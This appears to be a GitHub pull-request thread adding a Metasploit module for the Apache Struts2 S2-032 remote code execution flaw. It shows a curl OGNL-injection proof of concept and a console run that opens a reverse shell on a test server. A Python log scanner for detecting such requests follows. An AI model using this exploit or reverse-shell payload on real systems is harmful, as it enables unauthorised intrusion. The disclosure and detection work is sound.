Closed. nixawk closed this 8 years ago.
curl -v http://demo.com/index.action?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%2C%23test%3D%23context.get%28%23parameters.res%5B0%5D%29.getWriter%28%29%2C%23test.println%28%23parameters.command%5B0%5D%29%2C%23test.flush%28%29%2C%23test.close&res=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=%23%23%23Struts2-S2-032-Vulnerable%23%23%23
I will try to clean up the code and give a new PR.
msf exploit(struts_code_exec_dynamic_method_invocation) > show options

Module options (exploit/multi/http/struts_code_exec_dynamic_method_invocation):

   Name             Current Setting                           Required  Description
   ----             ---------------                           --------  -----------
   CHECK_SLEEPTIME  5                                         yes       The time, in seconds, to ask the server to sleep while check
   Proxies                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST            192.168.1.105                             yes       The target address
   RPORT            8080                                      yes       The target port
   SSL              false                                     no        Negotiate SSL/TLS for outgoing connections
   TARGETURI        /struts2-blank/example/HelloWorld.action  yes       The path to a struts application action
   VHOST                                                      no        HTTP server virtual host

Payload options (linux/x86/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD    /bin/sh          yes       The command string to execute
   LHOST  192.168.1.101    yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux Universal

msf exploit(struts_code_exec_dynamic_method_invocation) > run

[*] Started reverse TCP handler on 192.168.1.101:4444
200
[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.105:39154) at 2016-04-28 21:48:34 +0800
id
uid=118(tomcat8) gid=125(tomcat8) groups=125(tomcat8)
Added in #6831
CVE-2016-3081 - Struts2 s2-032 — Remote Code Execution can be performed via method: prefix when Dynamic Method Invocation is enabled.
https://struts.apache.org/docs/s2-032.html
https://www.seebug.org/vuldb/ssvid-91389
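As an added example from the defender's side (not part of this PR or the Metasploit module), a small access-log check that flags requests using the `method:` prefix the advisory describes and, within it, OGNL markers such as `#_memberAccess` and `@ognl.OgnlContext` taken from the curl request above. The log lines, client addresses and the `scan_log`/`classify_request` helpers are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (combined-log style); addresses are made up.
# Line 1 carries an S2-032 style 'method:' + OGNL request, line 2 a bare DMI call.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Apr/2016:21:48:34 +0800] "GET /index.action?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%2C%23test%3D%23context.get%28%23parameters.res%5B0%5D%29.getWriter%28%29&res=com.opensymphony.xwork2.dispatcher.HttpServletResponse HTTP/1.1" 200 512
10.0.0.6 - - [28/Apr/2016:21:49:01 +0800] "GET /example/HelloWorld.action?method:execute HTTP/1.1" 200 1024
10.0.0.7 - - [28/Apr/2016:21:49:10 +0800] "GET /example/HelloWorld.action?name=alice HTTP/1.1" 200 1024
10.0.0.8 - - [28/Apr/2016:21:50:00 +0800] "POST /login.action HTTP/1.1" 302 0
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<verb>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Substrings (URL-decoded, lower-cased) that never belong in a Struts action
# method name; the first two come straight from the PoC request on this page.
OGNL_MARKERS = ("#_memberaccess", "@ognl.ognlcontext", "#context.get", "@java.lang.runtime")


def classify_request(target):
    """Classify one request target (path?query).

    Returns 'ognl' for a method: prefix carrying OGNL markers, 'dmi' for a plain
    Dynamic Method Invocation call (method:someAction), and None otherwise.
    """
    query = urlsplit(target).query
    verdict = None
    # keep_blank_values so 'method:foo' with no '=' still shows up as a name
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not name.startswith("method:"):
            continue
        decoded = (name + "=" + value).lower()
        if any(marker in decoded for marker in OGNL_MARKERS):
            return "ognl"
        verdict = "dmi"
    return verdict


def scan_log(text):
    """Return (client_ip, target, verdict) for every flagged request in text."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m.group("target"))
        if verdict:
            hits.append((m.group("ip"), m.group("target"), verdict))
    return hits


if __name__ == "__main__":
    for ip, target, verdict in scan_log(SAMPLE_LOG):
        print(f"{verdict:4}  {ip:10}  {target[:60]}")
```

A plain `dmi` hit is only suspicious where the application does not intentionally rely on Dynamic Method Invocation; the advisory's fix is to upgrade Struts and leave `struts.enable.DynamicMethodInvocation` set to false.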